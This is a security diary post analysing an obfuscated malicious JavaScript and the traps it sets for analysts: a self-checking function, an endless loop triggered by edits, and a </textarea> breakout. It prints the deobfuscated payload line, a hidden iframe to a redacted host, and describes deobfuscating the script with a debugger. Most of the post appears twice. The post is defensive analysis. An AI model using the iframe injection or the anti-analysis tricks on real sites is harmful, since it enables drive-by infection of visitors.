JavaScript traps for analysts
On Friday, Lorna posted a diary (http://isc.sans.org/diary.html?storyid=2325) about some malware we received that day. A compromised site hosted an obfuscated JavaScript program – a typical scenario you might say.
Over the weekend I received couple of e-mails from our readers asking how to deobfuscate that JavaScript so I spent more time analyzing it and I found some very interesting details and traps that are almost directly related to the nice diary Daniel posted couple of weeks ago (http://isc.sans.org/diary.html?storyid=2268).
If you haven’t read Daniel’s diary I recommend you definitely do so. Daniel showed 4 typical methods that you can use when analyzing obfuscated JavaScript programs. As you will see, of those 4 methods, 3 will fail on this example!
The JavaScript file that we will analyze is nicely obfuscated, as you can see below:
As most of similar obfuscation attempts, first a function is defined, called OAEC86 (as you will see, absolutely all variables have similar names which makes them more difficult to read for a human). At the end, that function is called with a big string as the input parameter (the obfuscated content).
Replacing document.write() with alert()
So, we have to analyze what the OAEC86 function does. As you can see on the screenshot above, the function ends with a call to document.write() which causes your browser to execute the (deobfuscated) code. If you try to approach this with method 1 from Daniel’s diary (replace document.write() calls with alert()), and start the JavaScript program, your browser will appear to hang and you will have to kill it with Task Manager. We will see later why did that happen, but let’s analyze the function itself first.
As the code has been stripped down of spaces, it’s difficult to analyze so I added some spaces and tabs to make it more human readable. There is one interesting variable that gets declared immediately at the beginning of the function:
var A112FA=arguments.callee.toString().replace(/\W/g,"").toUpperCase();
When I saw this I immediately remembered another diary I wrote some time ago (http://isc.sans.org/diary.html?storyid=1519), when I analyzed a similar thing, but this one goes a bit further.
So, the variable above gets its content from the arguments.callee.toString() call. This function returns back a text string which contains the whole called function, from the first line to the last one. A thing I found before was that there was a big difference between Internet Explorer and Mozilla in handling of white space, however, as you can see in the example above, that doesn’t matter as all non-word characters are stripped out with the replace() call (\W) and then converted to upper case. It's nice to see how attackers fixed this so it works correctly (from their point of view) in both IE and Mozilla.
So, after executing this call, the variable A112FA will contain the following string: “FUNCTION0AEC86T1F0AVARA112FA…”. You can see the beginning part of the code here.
As you can probably guess at this point in time, the function actually uses itself to deobfuscate the content. This way the author made sure that you can not change the function. However, this still doesn’t explain why the browser hangs when you change the the document.write() call to alert(). The answer lies further down.
Without analyzing every line of the code (that’s left as an exercise for you, if you are interested in this area), I’ll just explain why the browser hangs.
The big for loop in the code performs various permutations which deobfuscate the code. There is a while() loop in the code as well, which loops until the Q3A988 variable is different from zero. Now, when you change the document.write() call to alert() it will also cause this while() loop to keep looping (as Q3A988 will never have zero) which will in turn cause your browser to hang.
So the first method from the original diary is a no go here. Lets try with the second method.
Beware of </textarea>
Now, as the first method failed, you might want to try Tom Liston’s <textarea> method. First of all, I hope that you are aware that whenever you run code like this that you should do it in an isolated environment because you are running live, potentially malicious code. This is even more important in this case.
I’ll skip right to the point – when this program is deobfuscated, the result will be this:
</textarea><iframe src="http://[REMOVED]" width=1 height=1 style="border: 0px"></iframe>
What does this do? It closes the <textarea> tag that you might have put before. In other words, if you were running this in your browser and you used method 2) you would actually execute the malicious code! It is obvious that author of this code came prepared for analysts!
Next to method 3). In this case, method 3) isn’t really applicable as the deobfuscation code is way too complex to be rewritten in perl (if you really do it let me know).
So what are we left with? Method 4, or (my favourite), a debugger.
Defeating the obfuscation
One relatively easy way to deobfuscate this is to use SpiderMonkey, which is Mozilla’s JavaScript engine released as a standalone. It will not work just out of the box, though, as the JavaScript engine will not know what to do with document.write(), but folks at Websense wrote two nice JavaScript programs that you can use so you don’t have to replace any document.write() calls. Their method is explained at http://www.websense.com/securitylabs/blog/blog.php?BlogID=98, it’s a nice read that I definitely recommend.
I personally prefer to look at things with a debugger, though, so I’ll explain how to do this with Rhino. Rhino is Mozilla’s JavaScript debugger. It has a nice GUI and is written in Java, so it will work on any platform. You just must make sure that you have JRE installed.
A lot of users have problems starting it – you have to make sure that your Java classpath will be set to js.jar file that comes with Rhino, otherwise Java will not know how to find the class it needs. In the example below, I’ve extracted Rhino in the D:\Rhino directory and the malicious JavaScript file (with all HTML tags stripped out) is in d:\malware.js. Rhino should be started with the following command:
D:> java –classpath D:\Rhino\js.jar org.mozilla.javascript.tools.debugger.Main D:\malware.js
This will open a nice GUI window that is pretty much self explanatory. It is advised that you make the code human readable before this as that will allow you to set breakpoints easier – and as we’ve seen, in this case you can do it as the deobfuscation function will strip out white spaces.
You can now either step through the program, debug it and see how it works, or simply set a break point on the document.write() call and then inspect the I4D790 variable, as shown below:
You can see that it contains the code that would have been executed in the browser.
As we saw, malware authors are definitely improving their work and are, almost certainly, aware of methods that analysts use. In this case, the </textarea> tag was directed against analysts, as it made no other sense in the rest of the code. Luckily, whatever has to run on your machine can be analyzed, but it will probably not be as easy to do that as it was in the past, as malware continues to evolve.
UPDATE
Couple of updates with good stuff we've received from our readers:
1) Peter wrote to correct me regarding the Tom Liston's textarea method. This method actually also modifies the function (by adding <textarea> and </textarea> tags before and after the document.write() function call) so it will also fail because of the endless while() loop. This is not directly related to thing that they close the <textarea> tag, but see 2).
2) Aaron sent us a nice function he uses to deobfuscate stuff. Basically, he replaces the document.write() call with a function he defines, called documentwrite. The function looks like this:
function documentwrite(txt){
txt0=txt.replace("textarea","apple")
if(txt == txt0){
document.write("<textarea rows=50 cols=50>");
document.write(txt0);
document.write("</textarea>");
}
else{
txt1=txt.replace("textarea","apple")
documentwrite(txt1)
}
}
So he makes sure that the output will go in a textarea, even if there are nested </textarea> flags. In this case this might even work since the . from document.write() is removed anyway, so this will pass the self checking test this malware implements.
3) An anonymous reader wrote to tell that there might be some dependencies/problems with running Rhino on Linux, due to its Java implementation. Also, on Linux, the classpath parameter is called with "--classpath".
Thanks to all for your contributions.
Bojan
Over the weekend I received couple of e-mails from our readers asking how to deobfuscate that JavaScript so I spent more time analyzing it and I found some very interesting details and traps that are almost directly related to the nice diary Daniel posted couple of weeks ago (http://isc.sans.org/diary.html?storyid=2268).
If you haven’t read Daniel’s diary I recommend you definitely do so. Daniel showed 4 typical methods that you can use when analyzing obfuscated JavaScript programs. As you will see, of those 4 methods, 3 will fail on this example!
The JavaScript file that we will analyze is nicely obfuscated, as you can see below:
As most of similar obfuscation attempts, first a function is defined, called OAEC86 (as you will see, absolutely all variables have similar names which makes them more difficult to read for a human). At the end, that function is called with a big string as the input parameter (the obfuscated content).
Replacing document.write() with alert()
So, we have to analyze what the OAEC86 function does. As you can see on the screenshot above, the function ends with a call to document.write() which causes your browser to execute the (deobfuscated) code. If you try to approach this with method 1 from Daniel’s diary (replace document.write() calls with alert()), and start the JavaScript program, your browser will appear to hang and you will have to kill it with Task Manager. We will see later why did that happen, but let’s analyze the function itself first.
As the code has been stripped down of spaces, it’s difficult to analyze so I added some spaces and tabs to make it more human readable. There is one interesting variable that gets declared immediately at the beginning of the function:
var A112FA=arguments.callee.toString().replace(/\W/g,"").toUpperCase();
When I saw this I immediately remembered another diary I wrote some time ago (http://isc.sans.org/diary.html?storyid=1519), when I analyzed a similar thing, but this one goes a bit further.
So, the variable above gets its content from the arguments.callee.toString() call. This function returns back a text string which contains the whole called function, from the first line to the last one. A thing I found before was that there was a big difference between Internet Explorer and Mozilla in handling of white space, however, as you can see in the example above, that doesn’t matter as all non-word characters are stripped out with the replace() call (\W) and then converted to upper case. It's nice to see how attackers fixed this so it works correctly (from their point of view) in both IE and Mozilla.
So, after executing this call, the variable A112FA will contain the following string: “FUNCTION0AEC86T1F0AVARA112FA…”. You can see the beginning part of the code here.
As you can probably guess at this point in time, the function actually uses itself to deobfuscate the content. This way the author made sure that you can not change the function. However, this still doesn’t explain why the browser hangs when you change the the document.write() call to alert(). The answer lies further down.
Without analyzing every line of the code (that’s left as an exercise for you, if you are interested in this area), I’ll just explain why the browser hangs.
The big for loop in the code performs various permutations which deobfuscate the code. There is a while() loop in the code as well, which loops until the Q3A988 variable is different from zero. Now, when you change the document.write() call to alert() it will also cause this while() loop to keep looping (as Q3A988 will never have zero) which will in turn cause your browser to hang.
So the first method from the original diary is a no go here. Lets try with the second method.
Beware of </textarea>
Now, as the first method failed, you might want to try Tom Liston’s <textarea> method. First of all, I hope that you are aware that whenever you run code like this that you should do it in an isolated environment because you are running live, potentially malicious code. This is even more important in this case.
I’ll skip right to the point – when this program is deobfuscated, the result will be this:
</textarea><iframe src="http://[REMOVED]" width=1 height=1 style="border: 0px"></iframe>
What does this do? It closes the <textarea> tag that you might have put before. In other words, if you were running this in your browser and you used method 2) you would actually execute the malicious code! It is obvious that author of this code came prepared for analysts!
Next to method 3). In this case, method 3) isn’t really applicable as the deobfuscation code is way too complex to be rewritten in perl (if you really do it let me know).
So what are we left with? Method 4, or (my favourite), a debugger.
Defeating the obfuscation
One relatively easy way to deobfuscate this is to use SpiderMonkey, which is Mozilla’s JavaScript engine released as a standalone. It will not work just out of the box, though, as the JavaScript engine will not know what to do with document.write(), but folks at Websense wrote two nice JavaScript programs that you can use so you don’t have to replace any document.write() calls. Their method is explained at http://www.websense.com/securitylabs/blog/blog.php?BlogID=98, it’s a nice read that I definitely recommend.
I personally prefer to look at things with a debugger, though, so I’ll explain how to do this with Rhino. Rhino is Mozilla’s JavaScript debugger. It has a nice GUI and is written in Java, so it will work on any platform. You just must make sure that you have JRE installed.
A lot of users have problems starting it – you have to make sure that your Java classpath will be set to js.jar file that comes with Rhino, otherwise Java will not know how to find the class it needs. In the example below, I’ve extracted Rhino in the D:\Rhino directory and the malicious JavaScript file (with all HTML tags stripped out) is in d:\malware.js. Rhino should be started with the following command:
D:> java –classpath D:\Rhino\js.jar org.mozilla.javascript.tools.debugger.Main D:\malware.js
This will open a nice GUI window that is pretty much self explanatory. It is advised that you make the code human readable before this as that will allow you to set breakpoints easier – and as we’ve seen, in this case you can do it as the deobfuscation function will strip out white spaces.
You can now either step through the program, debug it and see how it works, or simply set a break point on the document.write() call and then inspect the I4D790 variable, as shown below:
You can see that it contains the code that would have been executed in the browser.
As we saw, malware authors are definitely improving their work and are, almost certainly, aware of methods that analysts use. In this case, the </textarea> tag was directed against analysts, as it made no other sense in the rest of the code. Luckily, whatever has to run on your machine can be analyzed, but it will probably not be as easy to do that as it was in the past, as malware continues to evolve.
UPDATE
Couple of updates with good stuff we've received from our readers:
1) Peter wrote to correct me regarding the Tom Liston's textarea method. This method actually also modifies the function (by adding <textarea> and </textarea> tags before and after the document.write() function call) so it will also fail because of the endless while() loop. This is not directly related to thing that they close the <textarea> tag, but see 2).
2) Aaron sent us a nice function he uses to deobfuscate stuff. Basically, he replaces the document.write() call with a function he defines, called documentwrite. The function looks like this:
function documentwrite(txt){
txt0=txt.replace("textarea","apple")
if(txt == txt0){
document.write("<textarea rows=50 cols=50>");
document.write(txt0);
document.write("</textarea>");
}
else{
txt1=txt.replace("textarea","apple")
documentwrite(txt1)
}
}
So he makes sure that the output will go in a textarea, even if there are nested </textarea> flags. In this case this might even work since the . from document.write() is removed anyway, so this will pass the self checking test this malware implements.
3) An anonymous reader wrote to tell that there might be some dependencies/problems with running Rhino on Linux, due to its Java implementation. Also, on Linux, the classpath parameter is called with "--classpath".
Thanks to all for your contributions.
Bojan
Keywords:
0 comment(s)
My next class:
Red Team Operations and Adversary Emulation | Paris | Sep 16th - Sep 21st 2024 |
×
Diary Archives
Comments